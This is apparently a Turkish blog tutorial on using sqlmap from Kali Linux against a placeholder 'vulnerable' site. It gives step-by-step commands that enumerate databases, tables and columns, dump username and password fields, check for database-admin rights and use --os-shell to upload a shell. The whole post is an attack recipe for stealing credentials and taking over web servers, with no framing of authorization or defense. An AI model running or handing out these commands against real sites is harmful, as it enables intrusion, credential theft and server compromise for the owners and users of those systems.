Kali Linux Sqlmap Kullanımı ve Shell Yükleme

Kali Linux Sqlmap Kullanımı ve Shell Yükleme

Önce Temel Sqlmap Kullanım Kodları ve Komutlarından bahsedeceğim.

Kali Linux'da düz sqlmap ve farklı dağıtımlarda sqlmap.py şeklinde çalıştırabilirsiniz.

Komutlar

sqlmap --dbs == Database Bilgilerini Çek
sqlmap -D == Database'den seçim yaptırır.
sqlmap --tables == Tabloları Çeker.
sqlmap -T == Tablolardan Seçim Yaptırır
sqlmap --columns == Kolonları Çeker.
sqlmap -C == Kolonlardan Seçim Yapar.
sqlmap --dump == Seçilen Database İsmi , Tablo İsmi , Kolon İsmin'den bilgileri çeker.

Örnek Sqlmap Kullanımı :

sqlmap -u zafiyetliadres.com/categories.php?cid=13 --dbs  = Bu işlem ile Database isimlerini site üzerinden çekiyoruz.(Gelen Tüm Uyarılara yes birtek vulnerable yazan satıra no)

sqlmap -u zafiyetliadres.com/categories.php?cid=13 -D HedefVeritabanı --tables = Hedef veri tabanından tabloları çekiyoruz.

sqlmap -u zafiyetliadres.com/categories.php?cid=13 -D HedefVeriTabanı -T Tablo1 --columns = Tablolardan Tablo1'in içinden bu admin olabilir users olabilir vs. Kolonları yani id,username,password bilgilerini seçtiriyoruz.

sqlmap -u zafiyetliadres.com/categories.php?cid=13 -D HedefVeriTabanı -T Tablo1 -C username,password --dump = Şeklinde databaseden istediğimiz tablo ve kolondan bilgileri çekiyoruz.

Sqlmap Kullanarak Shell Yükleme

Sqlmap ile shell yüklemek için  sqlmap -u zafiyetliadres.com/categories.php?cid=12  --is-dba komutuyla Sitenin Database Admini Olup Olmadığını Kontrol Ediyoruz.İşlem eğer yes ise yapmanız gereken çok basit --os-shell komutu sizi yönlendiriyor ve shellinizi upload ediyorsunuz.

 

Sqlmapı İleri Seviyede Kullanmak İçin Şu Yazıma Tıklayabilirsiniz. Diğer Yazılarımada Göz Atmayı Unutmayın :)